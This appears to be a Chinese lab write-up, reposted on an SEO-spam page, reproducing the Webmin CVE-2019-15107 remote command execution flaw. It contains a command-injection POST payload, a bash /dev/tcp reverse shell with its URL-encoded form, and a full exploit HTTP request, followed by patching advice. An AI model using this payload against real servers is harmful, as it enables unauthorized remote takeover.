当前位置: 首页 > news >正文

广州网站设计开发招聘资讯文章减肥健康wordpress

news 2025/11/7 12:22:38
广州网站设计开发招聘,资讯文章减肥健康wordpress,安徽建筑大学招生网录取查询,安徽建设工程信息网固镇县漏洞编号 CVE-2019-15107 webmin介绍 什么是webmin Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作http://www.webmin.com/Webmin 是一个用 Perl 编写的基于浏览器的管理应用程序。是一个基于Web的界面…

漏洞编号

CVE-2019-15107

webmin介绍

什么是webmin

  • Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作http://www.webmin.com/
  • Webmin 是一个用 Perl 编写的基于浏览器的管理应用程序。
  • 是一个基于Web的界面,用于Unix的系统管理。使用任何支持表和表单的浏览器,可以设置用户帐户,Apache,DNS,文件共享等。

为什么用webmin

  • Linux系统因其高效稳定而受到广大用户的推崇与青睐,然后其管理有一定复杂性和学习周期。为了降低 Linux系统的管理难度,有时候会对公司内的Linux主机或VPS系统预装了网页管理工具webmin

漏洞描述

该漏洞允许恶意第三方在缺少输入验证的情况下而执行恶意代码。

该漏洞由于password_change.cgi文件在重置密码功能中存在一个代码执行漏洞,该漏洞允许恶意第三方在缺少输入验证的情况下而执行恶意代码。

影响版本

Webmin<=1.920

漏洞复现

环境搭建

使用docker搭建

image-20231012172949982

image-20231012173010430

进行登录:https://127.0.0.1:10000/

image-20231012173815157

漏洞验证

https://192.168.16.176:10000/passwore_change.cgi

使用hackBar的post模式输入:user=rootxx&pam=&expired=2&old=text|ls&new1=test2&new2=test2

image-20231012191200290

使用bp抓包

image-20231012191747761

获得反弹shell

kali虚拟机中输入

nc -lvvp 666

bash -c "bash -i >& /dev/tcp/192.168.16.176/666 0>&1"url编码
%62%61%73%68%20%2d%63%20%22%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%39%32%2e%31%36%38%2e%31%36%2e%31%37%36%2f%36%36%36%20%30%3e%26%31%22

image-20231012192000178

将反弹shell脚本url编码过后替换数据包中的old

POST /password_change.cgi HTTP/1.1
Host: 192.168.16.176:10000
Cookie: redirect=1; testing=1
Content-Length: 62
Cache-Control: max-age=0
Sec-Ch-Ua: "Not?A_Brand";v="8", "Chromium";v="108"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: https://192.168.16.176:10000
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: document
Referer: https://192.168.16.176:10000/passwore_change.cgi
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Sec-Fetch-User: ?1
Connection: closeuser=rootxx&pam=&expired=2&old=%62%61%73%68%20%2d%63%20%22%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%39%32%2e%31%36%38%2e%31%36%2e%31%37%36%2f%36%36%36%20%30%3e%26%31%22&new1=test2&new2=test2

获得shell成功

image-20231012192408877

附带文件

wireshark

加固建议

  • 直接升级到1.930版本

  • 临时修补方案,可以定位漏洞代码所在的行,然后剔除后在github上下载password_change.cgi文件

参考信息

Vulhub - Docker-Compose file for vulnerability environment

Webmin 远程命令执行漏洞(CVE-2019-15107)

webmin远程命令执行漏洞(CVE-2019-15107)

漏洞分类

Webmin 远程命令执行漏洞

http://www.yayakq.cn/news/782733/

相关文章:

  • 怎么给自己的品牌做网站wordpress游客不加载图片
  • 做网站和app有什么区别哈尔滨今天重大新闻
  • 中小学门户网站建设有赞小程序开发报价
  • 菏泽网站建设熊掌号哈尔滨口碑好的建站公司
  • 滨州的网站开发赣州的免费网站建设
  • 长沙专业做网站排名wordpress 卸载插件
  • 网站建设是固定资产还是列费用怎么做网站前台
  • 网站开发指什么软件免费的黄页推广软件哪个好
  • 管理咨询网站建设小程序怎么运营推广
  • 南京网站设计费用南阳商都网站做网站
  • 国内设计好的网站案例下载网站软件免费安装
  • 科技管理信息网站的建设方案wordpress的后台
  • 盘锦公司做网站自己做网站教学视频
  • 免费推广网站排名网站如何被收录
  • js打开网站学校网站的常规化建设
  • 长沙网站创建wordpress 用户评论数
  • 广州市研发网站建设多少钱金华网站建设luopan
  • 房地产建设网站好看的商标logo设计
  • 搜狗优化排名永康关键词优化
  • wordpress缩略图加载慢电脑网络优化软件
  • 工作室做网站流程怎样建设营销型网站
  • 做的好的茶叶网站好怎么看网站有没有做301
  • 高密做网站哪家好价位支付宝网页版登录入口
  • 婚庆网站建设策划案wordpress 代码臃肿
  • 网站停留时间个人兴趣网站设计
  • wordpress建企业站教程产品开发项目管理
  • 布吉网站建设找哪家公司比较好山东安康建设项目管理有限公司网站
  • 企业网站建设方案 ppt网站挂载
  • 做神马网站平面设计培训班学费
  • 提供网站建设公司哪家好网站备案信息核验单填写